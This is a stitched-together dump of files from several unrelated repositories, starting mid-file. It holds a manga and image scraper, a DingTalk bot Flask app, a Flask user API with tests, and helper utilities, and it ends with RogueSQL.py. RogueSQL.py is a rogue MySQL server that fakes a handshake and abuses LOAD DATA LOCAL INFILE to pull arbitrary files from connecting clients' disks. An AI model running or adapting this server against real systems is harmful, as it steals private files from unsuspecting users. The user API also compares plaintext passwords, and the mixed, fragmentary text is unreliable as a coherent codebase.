m.prefer_download_list(url)
def download_main(
download: Callable[..., None],
download_playlist: Callable[..., None],
urls: List[str],
):
for url in urls:
if re.match(r"https?://", url) is None:
url = "http://" + url
if prefer_list:
download_playlist(url)
else:
download(url)
def parse_main(**kwargs):
logging.basicConfig(format="[%(levelname)s] %(message)s")
parser = ArgumentParser(
prog="ct-get",
usage="ct-get [OPTION] ... URL...",
description="tool for cartoon downloader",
)
# version info
parser.add_argument(
"-v", "--version", action="version", version=cartoon.__version__
)
# group arguments so the help output stays organized
run_grp = parser.add_argument_group("Dry run options", "(no actual download)")
run_grp.add_mutually_exclusive_group()
run_grp.add_argument(
"-i",
"--info",
action="store_true",
help="Print extracted information with URLs",
)
# download options
download_grp = parser.add_argument_group("Download options")
# debug prints extra information
download_grp.add_argument(
"-d",
"--debug",
action="store_true",
help="Show traceback and other debug infomation",
)
# the target is a playlist
download_grp.add_argument(
"-l", "--playlist", action="store_true", help="prefer to download list"
)
# collect the positional arguments as URLs
parser.add_argument("URL", nargs="*", help=argparse.SUPPRESS)
args = parser.parse_args()
if args.debug:
logging.getLogger().setLevel(logging.DEBUG)
global prefer_list
if args.playlist:
prefer_list = True
URLs: List[str] = []
URLs.extend(args.URL)
download_main(any_download, any_download_playlist, URLs)
def main(**kwargs):
"""
console entry point; delegates to parse_main
"""
parse_main(**kwargs)
```
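Since `url_to_module` only inspects the bare domain, the extractor resolution can be checked without downloading anything; a small sketch:
```python
# Sketch: resolving extractor modules from URLs via url_to_module.
from cartoon.cli import url_to_module

module, url = url_to_module("http://www.mzitu.com/12345")
print(module.__name__)   # cartoon.extractors.mztu

module, url = url_to_module("https://unknown-site.org/page")
print(module.__name__)   # cartoon.extractors.universal (the fallback)
```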
#### File: cartoon/extractors/fzdm.py
```python
import re
from bs4 import BeautifulSoup
from cartoon.common import *
IMAGE_HOST = "http://p3.manhuapan.com/"
HOST = "https://manhua.fzdm.com/"
SITE_NAME = "风之动漫"
def get_bs_element(content: str) -> BeautifulSoup:
bs = BeautifulSoup(content, "html.parser")
return bs
def get_next_page_link(current: str, content: str) -> Optional[str]:
bs = get_bs_element(content)
a_s = bs.find_all("a", "pure-button-primary")
a = list(filter(lambda tag: tag.string == "下一页", a_s))
if not a:
return None
node = a[0]
if node.string == "下一页":
path_spl = current.split("?")[0].split("/")
path_spl.pop(-1)
appended: str = node["href"]
path_spl.append(appended)
r = "/".join(path_spl)
return r
return None
def get_image_name(content: str) -> Optional[str]:
bs = get_bs_element(content)
a = bs.find("a", attrs={"class": "button-success"})
return a.string
def get_target_img_url(content: str) -> Optional[str]:
pattern = r'var mhurl="([\w\/.]+)'
result = match1(content, (pattern)) or []
target = result[0]
if not target:
return None
return IMAGE_HOST + target
def get_title(content: str) -> str:
bs = get_bs_element(content)
title: str = bs.title.get_text()
title = title.replace(SITE_NAME, "").strip()
return title
def get_filename(img_url: str, title: str, filename: str) -> str:
return filename + "." + img_url.split(".")[-1]
def prefer_download_list(url: str):
pass
def prefer_download(url: str):
print(url)
content: Optional[str] = None
content = str(get_content(url), encoding="utf-8")
while content:
target_url = get_target_img_url(content)
title = get_title(content)
filename = get_image_name(content)
if target_url and filename:
target_filename = get_filename(target_url, title, filename)
url_save(
target_url, target_filename,
)
next_page = get_next_page_link(url, content)
if not next_page:
content = None
else:
url = next_page
content = str(get_content(next_page), encoding="utf-8")
```
#### File: cartoon/extractors/jav.py
```python
import re
from bs4 import BeautifulSoup
from cartoon.util import log
from cartoon.common import *
HOST = "https://www.jav468.com/"
SITE_NAME = "_"
def get_bs_element(content: str) -> BeautifulSoup:
bs = BeautifulSoup(content, "html.parser")
return bs
def get_title(content: str) -> str:
bs = get_bs_element(content)
return bs.title.string
def get_all_links_for_list(content: str) -> List[str]:
bs = get_bs_element(content)
result: List[str] = []
wrapper = bs.findAll("div", attrs={"class": "thumbnail"})
for div in wrapper:
for child in div.children:
if child.name == "a":
result.append(child.attrs["href"])
return result
def get_imgs_from_page(content: str) -> List[str]:
bs = get_bs_element(content)
wrapper = bs.find("figure", attrs={"class": "wp-block-image"})
result: List[str] = []
for child in wrapper.descendants:
if child.name == "noscript":
for chi in child.descendants:
result.append(chi.attrs["src"])
return result
def download_list(url: str):
content: Optional[str] = str(get_content(url), encoding="utf-8")
if not content:
return
all_link = get_all_links_for_list(content)
for link in all_link:
download_one(link)
log.i("downloaded " + link)
if url.endswith("/"):
url = str(url[:-1])
items = url.split("/")
page = items.pop(-1)
newUrl = "/".join((items + [str(int(page) + 1)]))
download_list(newUrl)
def download_one(url: str):
print(url)
content: Optional[str] = None
content = str(get_content(url), encoding="utf-8")
images: List[str] = get_imgs_from_page(content)
if len(images) > 300:
return
folder = get_title(content)
safe_f = "".join(
[c for c in folder if c.isalpha() or c.isdigit() or c == " "]
).rstrip()
url_file_tuple: List[Tuple[str, str]] = [
(img, img.split("/")[-1]) for img in images
]
urls_save(url_file_tuple, safe_f)
prefer_download = download_one
prefer_download_list = download_list
```
#### File: cartoon/extractors/mz.py
```python
import re
from bs4 import BeautifulSoup
from cartoon.util import log
from cartoon.common import *
HOST = "http://meizi.info/"
SITE_NAME = "_"
def get_bs_element(content: str) -> BeautifulSoup:
bs = BeautifulSoup(content, "html.parser")
return bs
def get_title(content: str) -> str:
bs = get_bs_element(content)
return bs.title.string
def get_images_from_page(content: str) -> List[str]:
result: List[str] = []
bs = get_bs_element(content)
wrapper = bs.findAll("article", attrs={"class": "article-content"})
for div in wrapper:
for child in div.descendants:
if child.name == "img":
result.append(child.attrs["src"])
return result
def download_list(url: str):
pass
def download_one(url: str):
print(url)
content: str = str(get_content(url), encoding="utf-8")
images: List[str] = get_images_from_page(content)
folder = get_title(content)
safe_f = "".join(
[c for c in folder if c.isalpha() or c.isdigit() or c == " "]
).rstrip()
url_file_tuple: List[Tuple[str, str]] = [
(img, img.split("/")[-1]) for img in images
]
urls_save(url_file_tuple, safe_f)
prefer_download = download_one
prefer_download_list = download_list
if __name__ == "__main__":
url = "http://meizi.info/htm-data-7-1902-3441888.html"
download_one(url)
```
#### File: cartoon/util/log.py
```python
import os, sys
import time
def sprint(text: str, *colors) -> str:
return text
def println(text: str, *colors):
sys.stdout.write(sprint(text, *colors) + "\n")
def print_err(text: str, *colors):
sys.stderr.write(sprint(text, *colors) + "\n")
def print_log(text: str, *colors):
sys.stderr.write(sprint(text, *colors) + "\n")
def i(message: str):
print_log(message)
def yes_or_no(message: str) -> bool:
ans = str(input("%s (y/N)" % message)).lower().strip()
if ans == "y":
return True
return False
class SimpleProgressBar:
_displayed: bool = False
_received: int = 0
_speed: str = '0'
_bar: str = ""
def __init__(self, total_size: int):
self.total_size = total_size
self.last_updated = time.time()
self._bar = "{percent}% {recv}/{total}MB"
def update(self):
self._displayed = True
percent = round(self._received * 100 / self.total_size, 1)
bar = self._bar.format(percent=str(percent), recv=str(self._received), total=str(self.total_size))
sys.stdout.write("\r" + bar + "\r")
sys.stdout.flush()
def update_received(self, n: int):
self._received += n
time_diff = time.time() - self.last_updated
bytes_ps = n / time_diff if time_diff else 0
if bytes_ps >= 1024 ** 3:
self._speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)
elif bytes_ps >= 1024 ** 2:
self._speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)
elif bytes_ps >= 1024:
self._speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)
else:
self._speed = '{:4.0f} B/s'.format(bytes_ps)
self.last_updated = time.time()
self.update()
def update_piece(self, n: int):
self.current_piece = n
def done(self):
if self._displayed:
print()
self._displayed = False
class CountProgressBar:
_displayed: bool = False
_received: int = 0
_speed: str = '0'
_bar: str = ""
def __init__(self, total_count: int):
self.total_count = total_count
self._bar = "{percent}% {recv}/{total}"
def update(self):
self._displayed = True
percent = round(self._received * 100 / self.total_count, 1)
bar = self._bar.format(percent=str(percent), recv=str(self._received), total=str(self.total_count))
sys.stdout.write("\r" + bar + "\r")
sys.stdout.flush()
def update_received(self, n: int):
self._received += n
self.update()
def done(self):
if self._displayed:
print()
self._displayed = False
``` |
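A minimal sketch of how the progress bar is meant to be driven (fake chunks, no real download):
```python
# Sketch: feeding SimpleProgressBar with simulated download chunks.
import time

from cartoon.util.log import SimpleProgressBar

total = 1024 * 1024                   # pretend the file is 1 MiB
bar = SimpleProgressBar(total)
for _ in range(16):
    bar.update_received(total // 16)  # report each chunk as it "arrives"
    time.sleep(0.05)
bar.done()
```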
{
"source": "jiazifa/dingTalkRobotHelper",
"score": 2
} |
#### File: jiazifa/dingTalkRobotHelper/app.py
```python
import sys
from flask import Flask, render_template, request
from collections import namedtuple
Robot = namedtuple('Robot', ['name', 'key', 'push_title', 'access_token', 'access_secret'])
def parse_params(request):
""" 从一个Request实例中解析params参数
Args:
request: flask.request 实例对象
Return: 一个解析过的字典对象,如果没有解析出,则返回一个空的字典对象
"""
r = request
d = {}
if r.method == "GET":
if json:= r.args or r.get_json():
d = dict(json)
if r.method == "POST":
if json:= r.get_json() or r.args:
d = dict(json)
if not d:
d = dict(r.values)
return d
def find_robot_by_key(robots, key):
rs = list([Robot(r['name'], r['key'], r['push_title'], r['access_token'], r['access_secret']) for r in robots])
result = list(filter(lambda r: r.key == key, rs))
return result[-1]
app = Flask(__name__, static_folder='static', template_folder='templates')
config = {
'name': '钉钉小助手',
'robots': [{
'name': '',
'key': '',
'push_title': '',
'access_token': '',
'access_secret': '',
}]
}
try:
import local_setting
config.update(local_setting.config)
except ImportError:
pass
@app.route('/')
def index():
return render_template('index.html', config=config)
@app.route('/execute', methods=["POST"])
def execute():
params = parse_params(request)
key = str(params['key'])
content = str(params['content'])
atAll = bool(params['atAll'])
robot = find_robot_by_key(config['robots'], key)
if not robot:
return {'status': 'error', 'msg': '未找到机器人'}
try:
from dingtalkchatbot.chatbot import DingtalkChatbot, ActionCard, FeedLink, CardItem
new_webhook = 'https://oapi.dingtalk.com/robot/send?access_token=' + robot.access_token
xiaoding = DingtalkChatbot(new_webhook, secret=robot.access_secret, pc_slide=True, fail_notice=False)
xiaoding.send_markdown(title=robot.push_title, text=content, is_at_all=atAll)
return {'status': 'ok', 'msg': '发送成功'}
except ImportError:
return {'status': 'error', 'msg': '请引入 dingtalkchatbot 模块'}
except Exception as error:
return {'status': 'error', 'msg': '发送失败' + str(error)}
if __name__ == "__main__":
app.run(debug=False, port=5000, host='0.0.0.0')
``` |
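With the server running locally, `/execute` expects a JSON body carrying the robot key, the markdown content and an at-all flag; a minimal sketch with `requests` (the key value must match one configured in `local_setting.config`):
```python
# Sketch: pushing a markdown message through the /execute endpoint.
import requests

resp = requests.post(
    "http://127.0.0.1:5000/execute",
    json={
        "key": "my-robot",   # assumed key; must exist in the configured robots
        "content": "**Deploy finished**\n- service: api\n- status: ok",
        "atAll": False,
    },
)
print(resp.json())
```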
{
"source": "jiazifa/sky_main",
"score": 2
} |
#### File: app/utils/errors.py
```python
from app.utils.response import response_error
class ApiError:
@classmethod
def get_error(cls, error_code):
raise NotImplementedError
class CommonError(ApiError):
@classmethod
def get_error(cls, error_code: int=9999):
switcher = {
# 未知错误
9999: response_error(error_code=9999, msg="unknown_error", http_code=400),
# 参数不全或错误
40000: response_error(
error_code=40000, msg="args_missing_or_wrong", http_code=400
),
# token 过期
40204: response_error(error_code=40204, msg="token expired", http_code=400),
# 需要权限
43000: response_error(
error_code=43000, msg="need_permission", http_code=401
),
# 资源不存在
44000: response_error(error_code=44000, msg="url_not_found", http_code=404),
}
resp = switcher.get(error_code or 9999)
assert resp != None
return resp
@classmethod
def error_toast(cls, msg="error_message"):
return response_error(error_code=40001, msg=msg, http_code=400)
class UserError(CommonError):
""" 用户模块下的错误类型包装 """
@classmethod
def get_error(cls, error_code):
switcher = {
# account already exists
40200: response_error(
error_code=40200, msg="account_exsist", http_code=400
),
# no such account, the user cannot be found
40203: response_error(error_code=40203, msg="no_account", http_code=400),
}
return switcher.get(error_code) or super(UserError, cls).get_error(error_code)
```
#### File: app/utils/regex.py
```python
import re
from typing import Optional
def is_emoji(content: str) -> bool:
""" judge str is emoji
Args: str type
Return : Bool type , return True if is Emoji , else False
"""
if not content:
return False
if u"\U0001F600" <= content and content <= u"\U0001F64F":
return True
elif u"\U0001F300" <= content and content <= u"\U0001F5FF":
return True
elif u"\U0001F680" <= content and content <= u"\U0001F6FF":
return True
elif u"\U0001F1E0" <= content and content <= u"\U0001F1FF":
return True
else:
return False
def is_link(url: Optional[str]) -> bool:
""" 验证是否是一个链接
Args:
url: 需要验证的字符
Return: 如果是合法的链接,返回 True ,否则返回 False
"""
regex = r'(https?)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]'
result: Optional[re.Match] = re.match(regex, url)
return False if not result else True
def is_phone(content: str) -> bool:
""" 验证是否是一个手机号
Args:
url: 需要验证的号码
Return: 如果是合法的,返回 True ,否则返回 False
"""
regex = r'1[3|4|5|7|8][0-9]{9}'
result: Optional[re.Match] = re.match(regex, content)
return False if not result else True
def is_email(content: str) -> bool:
""" 验证是否是一个邮箱
Args:
url: 需要验证的邮箱
Return: 如果是合法的,返回 True ,否则返回 False
"""
regex = r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)'
result: Optional[re.Match] = re.match(regex, content)
return False if not result else True
```
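The three validators return plain booleans, so they can be sanity-checked directly:
```python
# Quick checks for the validators defined above.
from app.utils.regex import is_email, is_link, is_phone

assert is_link("https://example.com/path?q=1")
assert not is_link("not a url")
assert is_phone("13800138000")
assert is_email("someone@example.com")
assert not is_email("someone@")
```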
#### File: app/utils/strings.py
```python
import hashlib
import random
import datetime
import time
import re
from .regex import is_emoji
from typing import Dict, List, Optional
def get_unix_time_tuple(
date: Optional[datetime.datetime] = None,
millisecond: bool = False
) -> str:
""" get time tuple
get unix time tuple, default `date` is the current time
Args:
date: datetime, defaults to datetime.datetime.now() at call time
millisecond: if True, return the timestamp in milliseconds, default is False
Return:
a str type value, return unix time of the incoming time
"""
if date is None:
date = datetime.datetime.now()
time_tuple = time.mktime(date.timetuple())
time_tuple = round(time_tuple * 1000) if millisecond else time_tuple
second = str(int(time_tuple))
return second
def get_date_from_time_tuple(unix_time: Optional[str] = None, formatter: str = '%Y-%m-%d %H:%M:%S') -> str:
""" translate a unix timestamp into a formatted time string
Args:
unix_time: unix timestamp string, defaults to the current time
formatter: str time formatter
Return:
a str value, the formatted time of the incoming unix_time
"""
if unix_time is None:
unix_time = get_unix_time_tuple()
if len(unix_time) == 13:
unix_time = str(float(unix_time) / 1000)
t = int(unix_time)
time_locol = time.localtime(t)
return time.strftime(formatter, time_locol)
def getmd5(code: str) -> Optional[str]:
""" return md5 value of incoming code
get md5 from code
Args:
code: str value
Return:
return md5 value of code
"""
if code:
md5string = hashlib.md5(code.encode('utf-8'))
return md5string.hexdigest()
return None
def get_random_num(digit: int = 6) -> str:
""" get a random num
get random num
Args:
digit: digit of the random num, limit (1, 32)
Return:
return Generated random num
"""
if digit is None:
digit = 1
digit = min(max(digit, 1), 32) # at most 32 digits are supported
result = ""
while len(result) < digit:
append = str(random.randint(1, 9))
result = result + append
return result
def contain_emoji(content: str) -> bool:
""" judge str contain emoji str
Args: str type
Return : Bool type, return True if contain Emoji, else False
"""
for c in content:
if is_emoji(c):
return True
return False
def get_domain(url: str) -> str:
""" get domain from url by given
Args: str type
Return: str type, return domain if can get
"""
from urllib.parse import urlparse
parsed_uri = urlparse(url)
domain = '{uri.netloc}'.format(uri=parsed_uri)
return domain
def filter_all_img_src(content: str) -> List[str]:
replace_pattern = r'<[img|IMG].*?>' # regex for img tags
img_url_pattern = r'.+?src="(\S+)"' # regex for the img src url
img_url_list: List[str] = []
need_replace_list = re.findall(replace_pattern, content) # find all img tags
for tag in need_replace_list:
imgs = re.findall(img_url_pattern, tag)
if imgs:
img_url_list.append(imgs[0]) # collect every img url
return img_url_list
```
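A short sketch of the helpers above: round-tripping a timestamp, hashing a string, and pulling img URLs out of raw HTML:
```python
# Sketch: exercising the time, md5 and img-src helpers.
import datetime

from app.utils.strings import (
    filter_all_img_src, get_date_from_time_tuple, get_unix_time_tuple, getmd5,
)

ts = get_unix_time_tuple(datetime.datetime(2020, 1, 1, 12, 0, 0))
print(ts, get_date_from_time_tuple(ts))   # unix seconds and '2020-01-01 12:00:00'
print(getmd5("hello"))                     # md5 hex digest of "hello"

html = '<p><img src="https://example.com/a.jpg"> and <IMG src="/b.png"></p>'
print(filter_all_img_src(html))            # ['https://example.com/a.jpg', '/b.png']
```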
#### File: app/views/user.py
```python
from typing import Any, Dict, Optional
from flask import request, current_app, g, Blueprint
from app.utils import UserError, CommonError, NoResultFound, MultipleResultsFound
from app.utils import response_error, response_succ
from app.utils import get_random_num, get_unix_time_tuple, getmd5
from app.utils import session, parse_params, get_current_user, get_logger, redis_client
from app.utils import login_require, get_token_from_request, is_phone, is_email
from app.model import User, LoginRecordModel
api = Blueprint("user", __name__)
logger = get_logger(__name__)
def register():
params = parse_params(request)
email: str = params.get("email")
password: str = params.get("password")
q = session.query(User).filter(User.email == email, User.password == password)
exsist_user = session.query(q.exists()).scalar()
if exsist_user:
return UserError.get_error(error_code=40200)
user = User(email, password=password)
try:
session.add(user)
session.commit()
payload: Dict[str, int] = {"user_id": user.id}
return response_succ(body=payload)
except Exception as e:
return CommonError.get_error(error_code=9999)
def login():
params = parse_params(request)
email: Optional[str] = params.get("email")
password: Optional[str] = params.get("password")
if not email or not password:
return CommonError.get_error(error_code=40000)
try:
exsist_user: User = session.query(User).filter_by(
email=email, password=password
).one()
login_time: str = get_unix_time_tuple()
log_ip: str = request.args.get("user_ip") or request.remote_addr
record: LoginRecordModel = LoginRecordModel(exsist_user.id, log_ip)
record.save()
# update token
token: str = getmd5("-".join([email, password, get_random_num(2)]))
# store the token in redis with a 7-day expiry
cache_key: str = exsist_user.get_cache_key
time: int = 60 * 60 * 24 * 7
redis_client.client.set(cache_key, token, time)
redis_client.client.set(token, cache_key, time)
payload: Dict[str, any] = {"token": token, "user_id": exsist_user.id}
return response_succ(body=payload)
except NoResultFound:
return UserError.get_error(40203)
except Exception as e:
logger.error(e)
return CommonError.get_error(9999)
@login_require
def logout():
""" 登出
设置redis时间为过期
"""
params = parse_params(request)
token = get_token_from_request(request)
user: User = get_current_user()
cache_key: str = user.get_cache_key
redis_client.client.delete(cache_key, token)
return response_succ(body={})
@login_require
def user_info():
""" 获得用户基本信息
需要登录权限
"""
params = parse_params(request)
user: User = get_current_user()
payload: Dict[str, Any] = user.info_dict
return response_succ(body=payload)
@login_require
def modify_user_info():
params = parse_params(request)
user: User = get_current_user()
# user nickname
nickname =params.get("nickname")
phone = params.get("phone")
sex = int(params.get("sex"))
email = params.get("email")
if nickname:
user.nickname = nickname
if phone:
if is_phone(str(phone)) and len(phone) == 11:
user.mobilephone = phone
else: return CommonError.error_toast(msg="手机号码格式错误")
if sex:
if sex in (1, 0):
user.sex = sex
else: return CommonError.error_toast(msg="性别设置错误")
if email:
if is_email(email):
user.email = email
else: return CommonError.error_toast(msg="邮箱格式错误")
user.save(commit=True)
payload: Dict[str, Any] = user.info_dict
return response_succ(body=payload)
def mail_one_time_code(f: str):
pass
def setup_url_rule(api: Blueprint):
# register
api.add_url_rule("/register", view_func=register, methods=["POST"])
# login
api.add_url_rule("/login", view_func=login, methods=["POST"])
# modify user info
api.add_url_rule("/modify_info", view_func=modify_user_info, methods=["POST"])
# get user info
api.add_url_rule("/info", view_func=user_info, methods=["GET"])
# logout
api.add_url_rule("/logout", view_func=logout, methods=["POST"])
setup_url_rule(api)
```
#### File: sky_main/tests/test_0user.py
```python
import sys
from os import path
import json
import pytest
import random
from flask import Flask
from .helper import *
# add the project root to sys.path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
class TestUser:
def setup_method(self):
from app.utils import getmd5
self._email = DEFAULT_LOGIN_PARAMS.get("email")
self._password = DEFAULT_LOGIN_PARAMS.get("password")
def test_register_on_error(self, client):
password: str = <PASSWORD>
rv = client.post(
"/user/register", json={"email": self._email, "password": self._password,}
)
rv = client.post(
"/user/register", json={"email": self._email, "password": <PASSWORD>,}
)
assert rv.status_code == 400
def test_login(self, client):
password = <PASSWORD>
rv = client.post(
"/user/login", json={"email": self._email, "password": self._password,}
)
assert rv.status_code == 200
body = rv.json["data"]
self._token = body.get("token")
self._user_id = body.get("user_id")
assert body.get("user_id") != None
assert body.get("token") != None
def test_info(self, client):
token = get_token(client, DEFAULT_LOGIN_PARAMS)
rv = client.get("/user/info", headers={"token": token})
assert rv.status_code == 200
body = rv.json["data"]
assert body.get("email") == self._email
assert body.get("account_status") == 1
assert body.get("user_id") != 0
def test_change_info(self, client):
token = get_token(client, DEFAULT_LOGIN_PARAMS)
nickname = random.choice(["测试1", "测试2", "测试3", "测试4"])
sex = 1
phone = '13859943743'
rv = client.post("/user/modify_info", json={"nickname": nickname, "phone": phone, "sex": sex}, headers={"token": token})
print(rv.json)
assert rv.status_code == 200
rv = client.get("/user/info", headers={"token": token})
body = rv.json["data"]
print(body)
assert body.get("email") == self._email
assert body.get("account_status") == 1
assert body.get("user_id") == 1
assert body.get("nickname") == nickname
assert body.get("sex") == sex
assert body.get("phone") == phone
``` |
{
"source": "jiazifa/ToolHUB",
"score": 3
} |
#### File: ToolHUB/utils/helpers.py
```python
from typing import Union, Dict
import sys
import logging
LOGGERS: Dict[str, logging.Logger] = {}
def get_logger(name: Union[None, str] = None) -> logging.Logger:
""" 获得一个logger 实例,用来打印日志
Args:
name: logger的名称
Return:
返回一个logger实例
"""
global LOGGERS
if not name:
name = __name__
has = LOGGERS.get(name)
if has:
return has
logger = logging.getLogger(name=name)
stream_handler = logging.StreamHandler(sys.stdout)
LOG_LEVEL = 'DEBUG'
LOGGING_FORMATTER = "%(levelname)s - %(asctime)s - process: %(process)d - %(filename)s - %(name)s - %(lineno)d - %(module)s - %(message)s" # 每条日志输出格式
logger.setLevel(LOG_LEVEL)
stream_handler.setLevel(LOG_LEVEL)
formatter = logging.Formatter(LOGGING_FORMATTER)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
LOGGERS.setdefault(name, logger)
return logger
```
#### File: ToolHUB/utils/parser.py
```python
from lxml import etree
from typing import Union
def parser_first_text_or_content_if_could(html: etree._Element,
query_path: str) -> Union[str, None]:
"""
If the parsed result is a list, the first element is returned by default
"""
nodes = html.xpath(query_path)
if not nodes:
return None
if len(nodes) > 0:
desc = nodes[0]
if hasattr(desc, 'text'):
return str(desc.text)
return str(desc)
return None
``` |
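`parser_first_text_or_content_if_could` accepts any lxml element, so a small HTML snippet shows both branches (an element with `.text`, and a plain string from an attribute xpath); the import path is assumed:
```python
# Sketch: using the xpath helper on a small lxml tree.
from lxml import etree

from utils.parser import parser_first_text_or_content_if_could  # assumed path

html = etree.HTML('<div><h1 class="t">Hello</h1><a href="/next">more</a></div>')

print(parser_first_text_or_content_if_could(html, '//h1[@class="t"]'))  # 'Hello'
print(parser_first_text_or_content_if_could(html, '//a/@href'))         # '/next'
print(parser_first_text_or_content_if_could(html, '//missing'))         # None
```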
{
"source": "jib1337/Rogue-MySql-Server",
"score": 2
} |
#### File: jib1337/Rogue-MySql-Server/RogueSQL.py
```python
import socket
import asyncore
import asynchat
import struct
import logging
import logging.handlers
import argparse
import os
import sys
import signal
DEBUG = False
PORT = 3306
LOG_FILE = 'rogueSQL.log'
VERBOSE = False
SAVE_FOLDER = os.sep.join(os.path.abspath(__file__).split(os.sep)[:-1]) + os.sep + 'Downloads' + os.sep
ATTEMPTS = 3
# Logging stuff
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
tmp_format = logging.handlers.WatchedFileHandler(LOG_FILE, 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
tmp_format
)
parser = argparse.ArgumentParser(prog='RogueSQL', description='Rogue MySQL server')
parser.add_argument("-p", metavar='port', help='port to run the server on', type=int)
parser.add_argument("-f", metavar='filename', help="specify a single filename to retrieve")
parser.add_argument("-l", metavar='filelist', help="path to file with list of files for download")
parser.add_argument("-a", metavar='attempts', help='how many times to request a file before giving up', type=int)
parser.add_argument("-v", action='store_true', help='toggle verbosity')
parser.add_argument("-d", action='store_true', help='log debug messages')
def handler(sig, frame):
print('[+] Exiting now...')
sys.exit(0)
class LastPacket(Exception):
pass
class OutOfOrder(Exception):
pass
class mysql_packet(object):
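# Standard MySQL framing: a 3-byte little-endian payload length followed by a
# 1-byte sequence id (packed here as low 16 bits, high byte, sequence number).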
packet_header = struct.Struct('<HbB')
packet_header_long = struct.Struct('<HbbB')
def __init__(self, packet_type, payload):
if isinstance(packet_type, mysql_packet):
self.packet_num = packet_type.packet_num + 1
else:
self.packet_num = packet_type
self.payload = payload
def __str__(self):
payload_len = len(self.payload)
if payload_len < 65536:
header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num % 255)
else:
header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num % 255)
result = "{0}{1}".format(
header,
self.payload
)
return result
def __repr__(self):
return repr(str(self))
@staticmethod
def parse(raw_data):
packet_num = ord(raw_data[0])
payload = raw_data[1:]
return mysql_packet(packet_num, payload)
class http_request_handler(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self, sock=addr[0])
self.addr = addr[1]
self.ibuffer = []
self.filenumber = 0
self.current_filename = ''
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'Auth'
self.logined = False
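# Send the server greeting (protocol 10 handshake) right away so the client
# believes it is talking to a real MySQL 5.6 server.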
self.push(
mysql_packet(
0,
"".join((
'\x0a', # Protocol
'5.6.28-0ubuntu0.14.04.1' + '\0',
'\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
)) )
)
self.order = 1
self.states = ['LOGIN', 'CAPS', 'ANY']
def push(self, data):
if DEBUG:
log.debug('Pushed: %s', data)
data = str(data)
asynchat.async_chat.push(self, data)
def collect_incoming_data(self, data):
self.ibuffer.append(data)
def found_terminator(self):
data = "".join(self.ibuffer)
self.ibuffer = []
if self.state == 'LEN':
len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
if len_bytes < 65536:
self.set_terminator(len_bytes)
self.state = 'Data'
else:
self.state = 'MoreLength'
elif self.state == 'MoreLength':
if data[0] != '\0':
self.push(None)
self.close_when_done()
else:
self.state = 'Data'
elif self.state == 'Data':
packet = mysql_packet.parse(data)
try:
if self.order != packet.packet_num:
raise OutOfOrder()
else:
self.order = packet.packet_num + 2
if packet.packet_num == 0:
global prevFilename
global failCount
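# 0x03 is COM_QUERY: the client sent a query, so answer with a file request.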
if packet.payload[0] == '\x03':
# Set the current file
self.current_filename = filelist[self.filenumber]
if DEBUG:
log.info('Previous request: %s; Next request: %s' % (prevFilename, self.current_filename))
if self.current_filename == prevFilename:
# Means a failed request previously
failCount += 1
if failCount != ATTEMPTS:
print('[-] Moving on from this file in ' + str(ATTEMPTS - failCount) + ' attempt/s')
else:
print('[-] Moving on to next file')
del filelist[self.filenumber]
failCount = 0
if len(filelist) == 1:
print('[+] End of file list reached')
print('[+] Exiting now...')
sys.exit(0)
self.current_filename = filelist[self.filenumber]
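# A response starting with 0xFB names a local file: this is the LOAD DATA
# LOCAL INFILE trick that makes the client upload that file from its own disk.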
PACKET = mysql_packet(
packet,
'\xFB{0}'.format(self.current_filename)
)
if DEBUG:
log.info('Requesting for file: %s' % self.current_filename)
print('[+] Requesting %s' % self.current_filename)
prevFilename = self.current_filename
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(PACKET)
elif packet.payload[0] == '\x1b':
if DEBUG:
log.info('SelectDB')
self.push(mysql_packet(
packet,
'\xfe\x00\x00\x02\x00'
))
raise LastPacket()
elif packet.payload[0] in '\x02':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
elif packet.payload == '\x00\x01':
self.push(None)
self.close_when_done()
else:
raise ValueError()
else:
# Received file handling
if self.sub_state == 'File':
if len(data) == 1:
if packet.packet_num < 256 and self.filenumber < len(filelist) - 1:
self.current_filename = filelist[self.filenumber]
self.set_terminator(3)
self.state = 'LEN'
self.sub_state = 'File'
self.push(
mysql_packet(packet, '\xFB{0}'.format(self.current_filename))
)
else:
self.push(
mysql_packet(packet, '\0\0\0\x02\0\0\0')
)
sys.exit(0)
else:
with open(SAVE_FOLDER + os.path.normpath(self.current_filename).split(os.sep)[-1], 'ab') as fl:
fl.write(data)
if self.current_filename not in obtained:
print('[+] File %s obtained' % self.current_filename)
obtained.add(self.current_filename)
del filelist[self.filenumber]
self.set_terminator(3)
self.state = 'LEN'
self.order = packet.packet_num + 1
elif self.sub_state == 'Auth':
self.push(mysql_packet(
packet, '\0\0\0\x02\0\0\0'
))
raise LastPacket()
else:
raise ValueError('Unknown packet')
except LastPacket:
if DEBUG:
log.info('Last packet')
self.state = 'LEN'
self.sub_state = None
self.order = 0
self.set_terminator(3)
except OutOfOrder:
if DEBUG:
log.warning('Packets out of order')
self.push(None)
self.close_when_done()
else:
if DEBUG:
log.error('Unknown state')
self.push('None')
self.close_when_done()
class mysql_listener(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
if not sock:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
